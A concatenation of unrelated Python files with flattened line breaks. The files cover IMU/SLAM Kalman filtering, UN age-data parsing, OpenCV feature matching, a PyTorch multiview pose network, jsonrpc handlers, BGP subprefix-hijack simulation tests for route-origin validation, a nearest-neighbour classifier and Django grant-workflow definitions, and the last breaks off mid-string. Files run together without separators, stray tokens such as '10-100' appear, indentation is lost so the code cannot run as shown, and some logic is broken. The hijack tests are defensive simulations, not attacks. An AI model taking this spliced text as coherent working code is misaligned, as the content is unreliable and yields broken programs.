""" return self._build_decorator( types.raw.Filter.parse(client=self, filters=filters, group=group, allow_private=allow_private, allow_bots=allow_bots, allow_groups=allow_groups, allow_channels=allow_channels, only_admins=only_admins, allow_via_bot=allow_via_bot, check_client=check_client, check_downpath=check_downpath, check_change_info_perm=check_change_info_perm, check_edit_perm=check_edit_perm, check_delete_perm=check_delete_perm, check_restrict_perm=check_restrict_perm, check_promote_perm=check_promote_perm, check_invite_perm=check_invite_perm, check_pin_perm=check_pin_perm)) Niederlage/VSLAM_UKF_SensorFusion0 import numpy as np from scipy.linalg import block_diag import scipy from Lie_Group_UKF.LG_Tool import Lie_Group, cholupdate import mathutils from scipy.spatial.transform import Rotation class RIEKF_Filter(): def __init__(self, xi0, bias0, timestamp, iter_steps, ERROR_CHECK): self.g = np.array([0, 0, -9.80665]) self.xi0 = xi0 self.bias0 = bias0 self.lg = Lie_Group() self.ERROR_CHECK = ERROR_CHECK self.iter_steps = iter_steps # init covariance p0Rot = (0.01 * np.pi / 180) ** 2 p0v = 1.e-4 p0x = 1.e-8 p0omegab = 1.e-6 p0ab = 1.e-6 P0 = np.concatenate((p0Rot * np.ones((3,)), p0v * np.ones((3,)), p0x * np.ones((3,)), p0omegab * np.ones((3,)), p0ab * np.ones((3,)))) self.P0 = np.diag(P0) self.S0 = np.linalg.cholesky(self.P0) # init pocess noise q_omega = (1.6968e-4) ** 2 * 200 q_a = (2e-3) ** 2 * 200 q_omegab = (1.9393e-5) ** 2 * 200 q_ab = (3e-3) ** 2 * 200 Q0 = np.concatenate( (q_omega * np.ones((3,)), q_a * np.ones((3,)), q_omegab * np.ones((3,)), q_ab * np.ones((3,)))) self.Qc = np.diag(np.sqrt(Q0)) # first round cholesky self.W = np.eye(3) * (2e-3) ** 2 # init trajectory quat0 = mathutils.Matrix(np.eye(3)).to_quaternion() v0 = np.array([0., 0., 0.]) x0 = np.array([0., 0., 0.]) u0 = np.zeros((6,)) self.trajectory = np.concatenate((quat0, v0, x0, u0)) # init observetime self.timestamp = timestamp self.obsTime = np.zeros((len(timestamp),)) self.obsTime[::10] = 1 def iekfPropagation(self, chi_i, bias_i, P_i, u_i, Q_i, dt_i): # IEKF on Lie Groups # N_lm = chi_i[:, 5:].shape[1] N_P = len(P_i) N_Q = len(Q_i) # state propagation omega_i = u_i[:3] acc_i = u_i[3:] omega_b = bias_i[:3] acc_b = bias_i[3:] Rot_i = chi_i[:3, :3] @ self.lg.expSO3((omega_i - omega_b) * dt_i) delta_a_i = Rot_i @ (acc_i - acc_b) v_i = chi_i[:3, 3] + (delta_a_i + self.g) * dt_i x_i = chi_i[:3, 4] + v_i * dt_i # covariance propagation F_i = np.eye(N_P) F_i[:3, 9:12] = - Rot_i * dt_i F_i[3:6, :3] = self.lg.hat_operator(self.g) * dt_i F_i[3:6, 9:12] = -self.lg.hat_operator(v_i) @ Rot_i * dt_i F_i[3:6, 12:15] = -Rot_i * dt_i F_i[6:9, :3] = self.lg.hat_operator(self.g) * dt_i * dt_i F_i[6:9, 3:6] = np.eye(3) * dt_i F_i[6:9, 9:12] = -self.lg.hat_operator(x_i) @ Rot_i * dt_i F_i[6:9, 12:15] = -Rot_i * dt_i * dt_i # if N_lm > 0: # for i in range(N_lm): # p_i = chi_i[:3, i + 9] # F_i[15 + 3 * i:18 + 3 * i, 9:12] = -self.lg.hat_operator(p_i) @ Rot_i * dt_i G_i = np.zeros((N_P, N_Q)) G_i[:3, :3] = Rot_i G_i[:3, 6:9] = Rot_i * dt_i G_i[3:6, :3] = self.lg.hat_operator(v_i) * Rot_i G_i[3:6, 3:6] = Rot_i G_i[3:6, 6:9] = self.lg.hat_operator(v_i) * Rot_i * dt_i * dt_i G_i[3:6, 9:12] = Rot_i * dt_i * dt_i G_i[6:9, :3] = self.lg.hat_operator(x_i) * Rot_i G_i[6:9, 3:6] = Rot_i * dt_i G_i[6:9, 6:9] = self.lg.hat_operator(x_i) * Rot_i * dt_i * dt_i * dt_i G_i[6:9, 9:12] = Rot_i * dt_i * dt_i * dt_i G_i[9:15, 6:12] = np.eye(6) P_predict = F_i @ P_i @ F_i.T + G_i @ (Q_i * dt_i) @ G_i.T * dt_i chi_predict = self.lg.state2chi(Rot_i, v_i, 
x_i, None) return chi_predict, P_predict def iekfUpdate(self, chi_i, bias_i, P_i, y_i, R_i): l_y = len(y_i) l_P = len(P_i) # l_lm = len(chi_i[:, 5:]) l_R = len(R_i) # Rc = np.linalg.cholesky(np.kron(np.eye(k), R_i)) bias_update = np.zeros((6,)) Rot_i = chi_i[:3, :3] x_i = chi_i[:3, 4] # d_1 = np.array([0, 0, 0, 0, 1]) H_i = np.zeros((l_y, l_P)) H_i[:3, 6:9] = np.eye(3) # H_i[:3, :3] = 0.6 * self.lg.hat_operator(y_i) # if l_lm > 0: # lm_i = chi_i[:3, 5:] # Pnorm = np.linalg.norm(P_i) # y_predict = Rot_i.T @ (y_i - x_i) y_predict = x_i S_i = H_i @ P_i @ H_i.T + R_i K_i = P_i @ H_i.T @ np.linalg.inv(S_i) P_corrected = (np.eye(l_P) - K_i @ H_i) @ P_i # K_i_reduced = K_i[6:9, :] xibar = (K_i @ (y_i - y_predict)[:, None]).flatten() # innovation bias_update[:3] = bias_i[:3] + xibar[9:12] bias_update[3:] = bias_i[3:] + xibar[12:15] xibar = xibar[:9] # Update mean state chi_next = self.lg.expSE3(xibar) @ chi_i return chi_next, bias_update, P_corrected def updateTraj(self, traj, chi, u): Rot, v, x, _p = self.lg.chi2state(chi) quat = np.array(mathutils.Matrix(Rot).to_quaternion()) state_rows = np.concatenate((quat, v, x, u)) traj = np.vstack((traj, state_rows)) return traj def run_iekf(self, omega, acc, y_mess, test_quat): # init all t_i = 0 trajI = self.trajectory P_I = self.P0 Qc = self.Qc bias_i = self.bias0 RotI = self.lg.expSO3(self.xi0[:3]) vI = self.xi0[3:6] xI = self.xi0[6:9] chiI = self.lg.state2chi(RotI, vI, xI, None) errorlist = np.zeros((1, 3)) for step_i in range(1, self.iter_steps): # propagation omega_i = omega[:, step_i] acc_i = acc[:, step_i] dt = self.timestamp[step_i] - self.timestamp[step_i - 1] chiI_last = np.copy(chiI) # motion dynamic # dRotI = self.lg.expSO3((omega_i - bias_i[:3]) * dt) # RotI = RotI @ dRotI # dvI = (RotI @ (acc_i - bias_i[3:]) + self.g) * dt # vI = vI + dvI # xI = xI + vI * dt # chiI_predict = self.lg.state2chi(RotI, vI, xI, None) u_i = np.hstack((omega_i, acc_i)) chiI_predict, P_I = self.iekfPropagation(chiI_last, bias_i, P_I, u_i, Qc, dt) normP_I = np.linalg.norm(P_I) # calculate propagation error test_rot = mathutils.Quaternion(test_quat[:, step_i]) test_theta = Rotation.from_matrix(np.array(test_rot.to_matrix())) test_theta = test_theta.as_euler('zyx', degrees=True) cal_theta = Rotation.from_matrix(chiI_predict[:3, :3]) cal_theta = cal_theta.as_euler('zyx', degrees=True) x_error = np.linalg.norm(y_mess[:, step_i] - chiI_predict[:3, 4]) if self.ERROR_CHECK: temp_error = test_theta - cal_theta else: theta_error = np.linalg.norm(test_theta - cal_theta) temp_error = np.array([step_i, theta_error, x_error]) errorlist = np.vstack((errorlist, temp_error)) # measurement and update if self.obsTime[step_i] == 1: chiI, bias_i, P_I = self.iekfUpdate(chiI_predict, bias_i, P_I, y_mess[:, t_i], self.W) trajI = self.updateTraj(trajI, chiI, u_i) t_i += 1 else: trajI = self.updateTraj(trajI, chiI_predict, u_i) chiI = chiI_predict return trajI, errorlist if __name__ == '__main__': dtt = 0.01 10-100 import sys import re import json import argparse from collections import defaultdict, Counter # --------------------------------------------------------- # Globals UNdata = "data/UNdata_Export_20200229_174614791.csv" Delta = 10 # --------------------------------------------------------- # Functions def parse_table(rdr, rowkey="Country or Area"): hdr = [s.strip('"') for s in rdr.readline().strip().split(',')] I = hdr.index(rowkey) tbl = defaultdict(list) hdr.pop(I) for line in rdr: if line == '\n' or '"footnoteSeqID"' in line: break elts = re.split(r',(?=")', line.strip('\n')) key 
= elts.pop(I).strip('"') tbl[key].append({h:elt for h, elt in zip(hdr, elts)}) return dict(tbl) def compile_distribution(tbl): ages = {k:[] for k in tbl.keys()} bps = list(range(Delta, 80+Delta, Delta)) for cntry, data in tbl.items(): # Need to deal with all possibe cases of age entries here num = Counter([d['Age'].strip('"') for d in data if d['Age'] != '"Total"']) if num["0 - 4"] > 0: # Multiple years can be present w/in data set. # If so, choose the latest if num["0 - 4"] == 1: cnts = { d['Age'].strip('"') : int(float(d['Value'].strip('"'))) for d in data } else: # TODO: Check that all key/value pairs are represented twice... src_yr = max([ int(d['Source Year'].strip('"')) for d in data ]) cnts = { d['Age'].strip('"') : int(float(d['Value'].strip('"'))) for d in data if int(d['Source Year'].strip('"')) == src_yr } ages[cntry] = [0 for _ in range(len(bps)+1)] a, i = 0, 0 while a < 200: if i < len(bps) and a >= bps[i]: i += 1 if (s := f"{a} - {a+4}") in cnts: ages[cntry][i] += cnts[s] a += 5 continue elif (s := f"{a} +") in cnts: ages[cntry][i] += cnts[s] break elif num["0"] == 1: cnts = { d['Age'].strip('"') : int(float(d['Value'].strip('"'))) for d in data } a, i = 0, 0 ages[cntry] = [0 for _ in range(len(bps)+1)] while a < 200: if i < len(bps) and a >= bps[i]: i += 1 if str(a) in cnts: ages[cntry][i] += cnts[str(a)] else: # NOTE: Assumes age distribution in file is in 5 yr breaks if (s := f"{a} - {a+4}") in cnts: ages[cntry][i] += cnts[s] a += 5 continue elif (s := f"{a} +") in cnts: ages[cntry][i] += cnts[s] break a += 1 else: print(f"Could not parse data for country '{cntry}'", file=sys.stderr) del ages[cntry] return ages, [0] + bps def canonicalize(ages, bps): data = {} keys = [f"{b}-{bps[i+1]-1}" for i, b in enumerate(bps[:-1])] + [f"{bps[-1]}+"] for cntry, vals in ages.items(): data[cntry] = {k:val for k, val in zip(keys, vals)} return data def concatenate(*tbls): full_tbl = tbls[0] Ks = set(full_tbl.keys()) for tbl in tbls[1:]: for new_cntry in set(tbl.keys()).difference(set(full_tbl.keys())): full_tbl[new_cntry] = tbl[new_cntry] return full_tbl # --------------------------------------------------------- # Main point of entry parser = argparse.ArgumentParser(description="Convert UN age csv into our json format", usage='''parse_age_dists.py [, ...] Outputs json formatted distribution to standard output. If more than one path is given, secondary csv files are concatenated to the first. ''') parser.add_argument("files", metavar="[path(s) to file]", type=str, nargs='+', help="path to csv file with UN age distributions") if __name__ == "__main__": args = parser.parse_args() tbls = [] for path in sorted(args.files): print(f"Analyzing {path}", file=sys.stderr) if not path.endswith(".csv"): print(f"Input must be a csv formatted file. Recieved {path.split('.')[-1]}", file=sys.stderr) exit(1) tbls.append(parse_table(open(path))) tbl = concatenate(*tbls) print(f"Number of countries: {len(tbl)}", file=sys.stderr) data = canonicalize(*compile_distribution(tbl)) json.dump(data, sys.stdout) import cv2 from matplotlib import pyplot as plt # Load the images. img0 = cv2.imread('../images/nasa_logo.png', cv2.IMREAD_GRAYSCALE) img1 = cv2.imread('../images/kennedy_space_center.jpg', cv2.IMREAD_GRAYSCALE) # Perform ORB feature detection and description. orb = cv2.ORB_create() kp0, des0 = orb.detectAndCompute(img0, None) kp1, des1 = orb.detectAndCompute(img1, None) # Perform brute-force KNN matching. 
bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=False) pairs_of_matches = bf.knnMatch(des0, des1, k=2) # Sort the pairs of matches by distance. pairs_of_matches = sorted(pairs_of_matches, key=lambda x:x[0].distance) # Draw the 25 best pairs of matches. img_pairs_of_matches = cv2.drawMatchesKnn( img0, kp0, img1, kp1, pairs_of_matches[:25], img1, flags=cv2.DRAW_MATCHES_FLAGS_NOT_DRAW_SINGLE_POINTS) # Show the pairs of matches. plt.imshow(img_pairs_of_matches) plt.show() # Apply the ratio test. matches = [x[0] for x in pairs_of_matches if len(x) > 1 and x[0].distance < 0.8 * x[1].distance] # Draw the best 25 matches. img_matches = cv2.drawMatches( img0, kp0, img1, kp1, matches[:25], img1, flags=cv2.DRAW_MATCHES_FLAGS_NOT_DRAW_SINGLE_POINTS) # Show the matches. plt.imshow(img_matches) plt.show() # ------------------------------------------------------------------------------ # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. # Written by () # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division from __future__ import print_function import torch import torch.nn as nn class ChannelWiseFC(nn.Module): def __init__(self, size): super(ChannelWiseFC, self).__init__() self.weight = nn.Parameter(torch.Tensor(size, size)) self.weight.data.uniform_(0, 0.1) def forward(self, input): N, C, H, W = input.size() input_reshape = input.reshape(N * C, H * W) output = torch.matmul(input_reshape, self.weight) output_reshape = output.reshape(N, C, H, W) return output_reshape class Aggregation(nn.Module): def __init__(self, cfg, weights=[0.4, 0.2, 0.2, 0.2]): super(Aggregation, self).__init__() NUM_NETS = 12 # 12 because each view is fused with 3 other views (?) size = int(cfg.NETWORK.HEATMAP_SIZE[0]) self.weights = weights self.aggre = nn.ModuleList() for i in range(NUM_NETS): self.aggre.append(ChannelWiseFC(size * size)) def sort_views(self, target, all_views): indicator = [target is item for item in all_views] new_views = [target.clone()] for i, item in zip(indicator, all_views): if not i: new_views.append(item.clone()) return new_views def fuse_with_weights(self, views): target = torch.zeros_like(views[0]) for v, w in zip(views, self.weights): target += v * w return target def forward(self, inputs): index = 0 outputs = [] nviews = len(inputs) for i in range(nviews): sorted_inputs = self.sort_views(inputs[i], inputs) warped = [sorted_inputs[0]] for j in range(1, nviews): fc = self.aggre[index] fc_output = fc(sorted_inputs[j]) warped.append(fc_output) index += 1 output = self.fuse_with_weights(warped) outputs.append(output) return outputs class MultiViewPose(nn.Module): def __init__(self, PoseResNet, Aggre, CFG): super(MultiViewPose, self).__init__() self.config = CFG self.resnet = PoseResNet self.aggre_layer = Aggre def forward(self, views): if isinstance(views, list): single_views = [] for view in views: heatmaps = self.resnet(view) single_views.append(heatmaps) multi_views = [] if self.config.NETWORK.AGGRE: multi_views = self.aggre_layer(single_views) return single_views, multi_views else: return self.resnet(views) def get_multiview_pose_net(resnet, CFG): Aggre = Aggregation(CFG) model = MultiViewPose(resnet, Aggre, CFG) return model # -*- coding: utf-8 -*- from twisted.internet import defer from jsonrpc import errors class Add(object): # ... 
def __init__(self, request, *args, **kwargs): self.x = kwargs['x'] self.y = kwargs['y'] def __call__(self): # raise errors.ParseError() return self.x + self.y class Sub(object): # ... def __init__(self, request, *args, **kwargs): self.x = kwargs['x'] self.y = kwargs['y'] @defer.inlineCallbacks def __call__(self): yield # raise errors.ParseError() defer.returnValue(self.x - self.y) #!/usr/bin/env python3 # -*- coding: utf-8 -*- """This file contains system tests for the extrapolator. For speciifics on each test, see the docstrings under each function. """ import pytest from .graph_tester import Graph_Tester #from ..tables import Hijack from ....enums import Non_Default_Policies, Policies, Data_Plane_Conditions as Conds from ...attacks.attack_classes import Subprefix_Hijack from ...attacks.attack import Attack __author__ = "" __credits__ = [""] __Lisence__ = "BSD" __maintainer__ = "" __email__ = "" __status__ = "Development" class Test_Special_Cases(Graph_Tester): """Tests all example graphs within our paper.""" def test_v2_customer_blackhole(self): r""" 55 / \ 44 3 / \ 666 77 Here we're testing that v2 ASes should not create blackhole announcements for attack announcements received from a customer, but rather just drop and blackhole the announcement. That can be capture here as 55 and 44 implementing ASes. AS 44 should not have a blackhole, but AS 55 should have a blackhole. """ attack_types = [Subprefix_Hijack] adopt_policies = [Non_Default_Policies.ROVPP_V2] peer_rows = [] provider_customer_rows = [[55, 44], [55, 3], [3, 666], [3, 77]] # Set adopting rows bgp_ases = [3, 666, 77] rov_adopting_ases = [] rovpp_adopting_ases = [55, 44] adopting_rows = [] for bgp_as in bgp_ases: adopting_rows.append([bgp_as, Policies.DEFAULT.value, False]) # for adopting_as in rov_adopting_ases: # adopting_rows.append([adopting_as, Policies.ROV.value, True]) for adopting_as in rovpp_adopting_ases: adopting_rows.append([adopting_as, Policies.ROVPP_V2.value, True]) attacker = 666 victim = 77 exr_output = [ {'asn': 77, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 64514}, {'asn': 77, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 64514}, {'asn': 44, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 55}, {'asn': 55, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 3}, {'asn': 55, 'origin': 64512, 'prefix': '1.2.3.0/24', 'received_from_asn': 64512}, {'asn': 3, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 77}, {'asn': 3, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 666}, {'asn': 666, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 3}, {'asn': 666, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 64513} ] self._test_graph(attack_types=attack_types, adopt_policies=adopt_policies, peer_rows=peer_rows, provider_customer_rows=provider_customer_rows, adopting_rows=adopting_rows, attacker=attacker, victim=victim, exr_output=exr_output) def test_v2_customer_peer_and_provider(self): r""" 55 --- 88 / \ \ 22 33 44 / \ 666 77 """ attack_types = [Subprefix_Hijack] adopt_policies = [Non_Default_Policies.ROVPP_V2] peer_rows = [[55, 88]] provider_customer_rows = [[55, 22], [55, 33], [33, 666], [33, 77], [88, 44]] # Set adopting rows bgp_ases = [33, 22, 44, 666, 77, 88] rov_adopting_ases = [] rovpp_adopting_ases = [55] adopting_rows = [] for bgp_as in bgp_ases: adopting_rows.append([bgp_as, Policies.DEFAULT.value, False]) for adopting_as in rovpp_adopting_ases: adopting_rows.append([adopting_as, Policies.ROVPP_V2.value, True]) attacker = 
666 victim = 77 exr_output = [ {'asn': 666, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 33}, {'asn': 666, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 64513}, {'asn': 44, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 88}, {'asn': 77, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 64514}, {'asn': 77, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 64514}, {'asn': 55, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 33}, {'asn': 55, 'origin': 64512, 'prefix': '1.2.3.0/24', 'received_from_asn': 64512}, {'asn': 22, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 55}, {'asn': 88, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 55}, {'asn': 33, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 77}, {'asn': 33, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 666} ] self._test_graph(attack_types=attack_types, adopt_policies=adopt_policies, peer_rows=peer_rows, provider_customer_rows=provider_customer_rows, adopting_rows=adopting_rows, attacker=attacker, victim=victim, exr_output=exr_output) import math import numpy as np def prediction_all(image, array): inf = math.inf acc = 0 # initiale index for i in range(0, len(array)): d = distance(image, array[i]) if inf > d: inf = d acc = i # suchen wir die aktuell kleinste Anstand mit ihre Index return array[acc][0] #d = distance(array[i], image) def smallassist(image, array): inf = math.inf acc = 0 for i in range(0, len(array)): d = distance(image, array[i]) if inf > d: inf = d acc = i return acc def secsmall(image, array): smallindex = smallassist(image,array) inf = math.inf acc = 0 for i in range(0,len(array)): if i == smallindex: i += 1 d = distance(image, array[i]) if inf > d: inf = d acc = i return array[acc][0] def secsmallassist(image,array): smallindex = smallassist(image, array) inf = math.inf acc = 0 for i in range(0, len(array)): if i == smallindex: i += 1 d = distance(image, array[i]) if inf > d: inf = d acc = i return acc def dritsmall(image,array): smallindex =smallassist(image,array) secsmallindex =secsmallassist(image,array) inf=math.inf acc=0 for i in range(0,len(array)): if i == smallindex: i += 1 elif i==secsmallindex: i=i+1 d = distance(image, array[i]) if inf > d: inf = d acc = i return array[acc][0] def distance(array1, array2): length = len(array1) if length != len(array2): print('error1') dist = 0 for i in range(1, length): dist += math.pow((array1[i] - array2[i]), 2) else: dist = math.sqrt(dist) # jede Matrix ist 16*16, mit 256+1 Index, die Abstand wird gerechnet return dist def prediction(data): result = [] for i in range(0, len(data)): tmp = int(prediction_all(data[i], data)) #tmp = int(prediction_all(data, data[i])) if (tmp == 0): tmp = -1 result.append(tmp) return np.transpose(np.matrix(result)) 10-100 import itertools from collections import defaultdict from enum import Enum from django.conf import settings from django.utils.text import slugify from django.utils.translation import gettext as _ """ This file defines classes which allow you to compose workflows based on the following structure: Workflow -> Stage -> Phase -> Action Current limitations: * Changing the name of a phase will mean that any object which references it cannot progress. [will be fixed when streamfield, may require intermediate fix prior to launch] * Do not reorder without looking at workflow automations steps in form_valid() in hypha/apply/funds/views.py and hypha/apply/review/views.py. 
""" class UserPermissions(Enum): STAFF = 1 ADMIN = 2 LEAD = 3 APPLICANT = 4 class Workflow(dict): def __init__(self, name, admin_name, **data): self.name = name self.admin_name = admin_name super().__init__(**data) def __str__(self): return self.name @property def stages(self): stages = [] for phase in self.values(): if phase.stage not in stages: stages.append(phase.stage) return stages @property def stepped_phases(self): phases = defaultdict(list) for phase in list(self.values()): phases[phase.step].append(phase) return phases def phases_for(self, user=None): # Grab the first phase for each step - visible only, the display phase return [ phase for phase, *_ in self.stepped_phases.values() if not user or phase.permissions.can_view(user) ] def previous_visible(self, current, user): """Find the latest phase that the user has view permissions for""" display_phase = self.stepped_phases[current.step][0] phases = self.phases_for() index = phases.index(display_phase) for phase in phases[index - 1::-1]: if phase.permissions.can_view(user): return phase class Phase: """ Phase Names: display_name = phase name displayed to staff members in the system public_name = phase name displayed to applicants in the system future_name = phase_name displayed to applicants if they haven't passed this stage """ def __init__(self, name, display, stage, permissions, step, public=None, future=None, transitions=dict()): self.name = name self.display_name = display if public and future: raise ValueError("Cant provide both a future and a public name") self.public_name = public or self.display_name self.future_name_staff = future or self.display_name self.future_name_public = future or self.public_name self.stage = stage self.permissions = Permissions(permissions) self.step = step # For building transition methods on the parent self.transitions = {} default_permissions = {UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN} for transition_target, action in transitions.items(): transition = dict() try: transition['display'] = action.get('display') except AttributeError: transition['display'] = action transition['permissions'] = default_permissions else: transition['method'] = action.get('method') conditions = action.get('conditions', '') transition['conditions'] = conditions.split(',') if conditions else [] transition['permissions'] = action.get('permissions', default_permissions) self.transitions[transition_target] = transition def __str__(self): return self.display_name def __repr__(self): return f'' class Stage: def __init__(self, name, has_external_review=False): self.name = name self.has_external_review = has_external_review def __str__(self): return self.name def __repr__(self): return f'' class Permissions: def __init__(self, permissions): self.permissions = permissions def can_do(self, user, action): checks = self.permissions.get(action, list()) return any(check(user) for check in checks) def can_edit(self, user): return self.can_do(user, 'edit') def can_review(self, user): return self.can_do(user, 'review') def can_view(self, user): return self.can_do(user, 'view') staff_can = lambda user: user.is_apply_staff # NOQA applicant_can = lambda user: user.is_applicant # NOQA reviewer_can = lambda user: user.is_reviewer # NOQA partner_can = lambda user: user.is_partner # NOQA community_can = lambda user: user.is_community_reviewer # NOQA def make_permissions(edit=list(), review=list(), view=[staff_can, applicant_can, reviewer_can, partner_can, ]): return { 'edit': edit, 'review': review, 'view': view, } 
no_permissions = make_permissions() default_permissions = make_permissions(edit=[staff_can], review=[staff_can]) hidden_from_applicant_permissions = make_permissions(edit=[staff_can], review=[staff_can], view=[staff_can, reviewer_can]) reviewer_review_permissions = make_permissions(edit=[staff_can], review=[staff_can, reviewer_can]) community_review_permissions = make_permissions(edit=[staff_can], review=[staff_can, reviewer_can, community_can]) applicant_edit_permissions = make_permissions(edit=[applicant_can, partner_can], review=[staff_can]) staff_edit_permissions = make_permissions(edit=[staff_can]) Request = Stage('Request', False) RequestExt = Stage('RequestExt', True) RequestCom = Stage('RequestCom', True) Concept = Stage('Concept', False) Proposal = Stage('Proposal', True) DRAFT_STATE = 'draft' INITIAL_STATE = 'in_discussion' SingleStageDefinition = [ { DRAFT_STATE: { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT}, 'method': 'create_revision', }, }, 'display': _('Draft'), 'stage': Request, 'permissions': applicant_edit_permissions, } }, { INITIAL_STATE: { 'transitions': { 'more_info': _('Request More Information'), 'internal_review': _('Open Review'), 'determination': _('Ready For Determination'), 'almost': _('Accept but additional info required'), 'accepted': _('Accept'), 'rejected': _('Dismiss'), }, 'display': _('Need screening'), 'public': _('Application Received'), 'stage': Request, 'permissions': default_permissions, }, 'more_info': { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'determination': _('Ready For Determination'), 'almost': _('Accept but additional info required'), 'accepted': _('Accept'), 'rejected': _('Dismiss'), }, 'display': _('More information required'), 'stage': Request, 'permissions': applicant_edit_permissions, }, }, { 'internal_review': { 'transitions': { 'post_review_discussion': _('Close Review'), INITIAL_STATE: _('Need screening (revert)'), }, 'display': _('Internal Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': Request, 'permissions': default_permissions, }, }, { 'post_review_discussion': { 'transitions': { 'post_review_more_info': _('Request More Information'), 'determination': _('Ready For Determination'), 'internal_review': _('Open Review (revert)'), 'almost': _('Accept but additional info required'), 'accepted': _('Accept'), 'rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': Request, 'permissions': hidden_from_applicant_permissions, }, 'post_review_more_info': { 'transitions': { 'post_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'determination': _('Ready For Determination'), 'almost': _('Accept but additional info required'), 'accepted': _('Accept'), 'rejected': _('Dismiss'), }, 'display': _('More information required'), 'stage': Request, 'permissions': applicant_edit_permissions, }, }, { 'determination': { 'transitions': { 'post_review_discussion': _('Ready For Discussion (revert)'), 'almost': _('Accept but additional info required'), 'accepted': _('Accept'), 'rejected': _('Dismiss'), }, 'display': _('Ready for Determination'), 'permissions': hidden_from_applicant_permissions, 'stage': Request, }, }, { 'accepted': { 
'display': _('Accepted'), 'future': _('Application Outcome'), 'stage': Request, 'permissions': staff_edit_permissions, }, 'almost': { 'transitions': { 'accepted': _('Accept'), 'post_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('Accepted but additional info required'), 'stage': Request, 'permissions': applicant_edit_permissions, }, 'rejected': { 'display': _('Dismissed'), 'stage': Request, 'permissions': no_permissions, }, }, ] SingleStageExternalDefinition = [ { DRAFT_STATE: { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT}, 'method': 'create_revision', }, }, 'display': _('Draft'), 'stage': RequestExt, 'permissions': applicant_edit_permissions, } }, { INITIAL_STATE: { 'transitions': { 'ext_more_info': _('Request More Information'), 'ext_internal_review': _('Open Review'), 'ext_determination': _('Ready For Determination'), 'ext_rejected': _('Dismiss'), }, 'display': _('Need screening'), 'public': _('Application Received'), 'stage': RequestExt, 'permissions': default_permissions, }, 'ext_more_info': { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': RequestExt, 'permissions': applicant_edit_permissions, }, }, { 'ext_internal_review': { 'transitions': { 'ext_post_review_discussion': _('Close Review'), INITIAL_STATE: _('Need screening (revert)'), }, 'display': _('Internal Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': RequestExt, 'permissions': default_permissions, }, }, { 'ext_post_review_discussion': { 'transitions': { 'ext_post_review_more_info': _('Request More Information'), 'ext_external_review': _('Open External Review'), 'ext_determination': _('Ready For Determination'), 'ext_internal_review': _('Open Internal Review (revert)'), 'ext_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': RequestExt, 'permissions': hidden_from_applicant_permissions, }, 'ext_post_review_more_info': { 'transitions': { 'ext_post_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': RequestExt, 'permissions': applicant_edit_permissions, }, }, { 'ext_external_review': { 'transitions': { 'ext_post_external_review_discussion': _('Close Review'), 'ext_post_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('External Review'), 'stage': RequestExt, 'permissions': reviewer_review_permissions, }, }, { 'ext_post_external_review_discussion': { 'transitions': { 'ext_post_external_review_more_info': _('Request More Information'), 'ext_determination': _('Ready For Determination'), 'ext_external_review': _('Open External Review (revert)'), 'ext_almost': _('Accept but additional info required'), 'ext_accepted': _('Accept'), 'ext_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': RequestExt, 'permissions': hidden_from_applicant_permissions, }, 'ext_post_external_review_more_info': { 'transitions': { 'ext_post_external_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More 
